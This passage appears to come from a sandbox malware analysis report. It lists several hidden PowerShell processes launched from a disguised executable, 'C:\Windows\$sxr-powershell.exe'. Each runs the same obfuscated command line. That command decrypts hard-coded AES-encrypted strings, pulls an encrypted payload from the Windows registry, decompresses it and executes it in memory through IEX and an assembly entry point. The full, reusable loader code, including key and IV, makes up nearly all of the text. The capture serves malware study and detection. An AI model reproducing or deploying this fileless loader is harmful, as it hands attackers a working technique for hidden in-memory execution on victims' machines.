-join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:5212
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        Hide Artifacts: Hidden Window
        
        PID:7720
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:6128
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        20⤵
        
        PID:7920
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8104).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = 